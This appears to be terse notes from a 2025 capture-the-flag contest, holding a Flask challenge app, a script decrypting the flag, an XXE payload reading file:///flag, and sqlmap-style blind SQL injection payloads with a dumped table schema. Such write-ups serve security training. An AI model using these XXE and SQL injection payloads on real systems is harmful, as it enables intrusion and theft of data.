蓝桥杯2025 wp

import os
from flask import Flask, request, render_template
from config import *
# author: gamelab
​
app = Flask(__name__)
​
# 模拟敏感信息
sensitive_info = SENSITIVE_INFO
​
# 加密密钥
encryption_key = ENCRYPTION_KEY
​
def simple_encrypt(text, key):
    encrypted = bytearray()
    for i in range(len(text)):
        char = text[i]
        key_char = key[i % len(key)]
        encrypted.append(ord(char) + ord(key_char))
    return encrypted.hex()
​
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)
​
# 模拟日志文件内容
log_content = f"用户访问了 /secret 页面，可能试图获取 {encrypted_sensitive_info}"
​
# 模拟隐藏文件内容
hidden_file_content = f"解密密钥: {encryption_key}"
​
# 指定安全的文件根目录
SAFE_ROOT_DIR = os.path.abspath('/app')
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w') as f:
    f.write(hidden_file_content)
​
@app.route('/')
def index():
    return render_template('index.html')
​
@app.route('/logs')
def logs():
    return render_template('logs.html', log_content=log_content)
​
@app.route('/secret')
def secret():
    return render_template('secret.html')
​
@app.route('/file')
def file():
    file_name = request.args.get('name')
    if not file_name:
        return render_template('no_file_name.html')
    full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))
    if not full_path.startswith(SAFE_ROOT_DIR) or 'config' in full_path:
        return render_template('no_premission.html')
    try:
        with open(full_path, 'r') as f:
            content = f.read()
        return render_template('file_content.html', content=content)
    except FileNotFoundError:
        return render_template('file_not_found.html')
​
if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')

解密密钥: secret_key3624

encryption_key = "secret_key3624"
def simple_encrypt(text, key):
    encrypted = bytearray()
    for i in range(len(text)):
        char = text[i]
        key_char = key[i % len(key)]
        encrypted.append(ord(char) + ord(key_char))
    return encrypted.hex()
def simple_decrypt(encrypted_text, key):
    decrypted = bytearray()
    encrypted_bytes = bytes.fromhex(encrypted_text)
    for i in range(len(encrypted_bytes)):
        byte = encrypted_bytes[i]
        key_char = key[i % len(key)]
        decrypted.append(byte - ord(key_char))
    return decrypted.decode('utf-8')
enc="d9d1c4d9e0aac5a4caa969989661d4cbc8a392a898cdc7a66c6d679aa09a9ca4cbab98a1c6af636668b1"
flag= simple_decrypt(enc, encryption_key)
print(flag)

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "file:///flag"> ]> 
<creds>&goodies;</creds>

import base64

base="KW7riR/XPwngxZyZVMhtk7hAuF3tGSMt5sLqai55nNE="
ciphertext = base64.b64decode(base)
# 取后16字节
ciphertext = ciphertext[-16:]
ciphertext = base64.b64encode(ciphertext).decode()
print(ciphertext)

# 打开文件
import os
​
import random
​
file = "C:\\Users\\Lenovo\\Downloads\\e.xml"
if os.path.exists(file):
    with open(file, 'r',encoding="utf8") as f:
        content = f.read()
​
#搜索所有.并输出.后的3位,并且去重
import re
pattern = r'\.(\w{3})'
matches = re.findall(pattern, content)
matches = set(matches)  # 去重
print(matches)  # 打印结果

参数: username (POST)
    类型: 基于布尔盲注
    标题: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=admin' AND 6417=6417 AND 'YBQW'='YBQW&password=123456
​
    类型: 基于时间的盲注
    标题: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 2454 FROM (SELECT(SLEEP(5)))tAAh) AND 'KUFZ'='KUFZ&password=123456

Database: ctf
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| username | varchar(20) |
+----------+-------------+